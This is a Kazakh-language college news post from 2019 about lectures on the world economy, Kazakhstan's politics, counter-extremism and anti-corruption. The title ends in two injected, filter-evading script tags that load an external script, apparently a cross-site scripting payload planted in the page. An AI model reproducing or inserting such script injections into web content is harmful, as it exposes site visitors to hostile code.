«Жаһандық ел. Экономикалық, саяси-құқықтық жағдай»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

19.11.2019

      2019 жыл қарашаның 11-16 аралығында «әлеуметтік-жаратылыстану пәндер» кафедрасы тарих пәнінің оқытушылары «Жаһандық ел. Экономикалық, саяси-құқықтық жағдай» тақырыбында ақпараттық дәрістер өткізілді. БМ-41, А-44 тобымен «Бүкіл әлемдік экономикалық және әлемдік нарық» тақырыбында, МД-22 ҚБ тобымен «Қазақстанның саяси және экономикалық жағдайы», А-41 тобымен «Біз терроризм мен экстремизмге қарсымыз», МД-41 «Сыбайлас жемқорлыққа қарсы күрес» атты интерактивті дәрістер өткізілді.

     Дәрістерді өткізудің мақсаты: Мемлекеттің нарықтық жүйедегі орнын және қызметтерін анықтау, экономикалық саясаттың калыптасуының теориялық негіздерін, оның негізгі тетіктерін жан-жақты қарастыру;

     Студенттердің дін және конфессияаралық қарым-қатынастардағы сауаттылығын арттыру, радикалды діни ағымдарға тарту тәуекелдерінің алдын алу, дәстүрлі рухани және ұлттық құндылықтарға назар аудару;

       Адам құқықтары жайлы түсініктерін қалыптастыра отырып, сыбайлас-жемқорлықтың, әсіресе, мемлекеттік билік органдарында, экономикаға қауіпті екенін түсіндіру;

      Құқықтарымен және сыбайлас жемқорлық үшін қылмыстық, тәртіптік, әкімшілік жауапкершілікті реттейтін арнайы нормативтік-құқықтық актілермен таныстыру.

      Студенттер ұсынылған тақырыптар бойынша қызығушылық танытып, өз пікірлерімен бөлісті.

 

Просмотров: 683


Пікір қосу



Деректерді қолтаңбаға қосу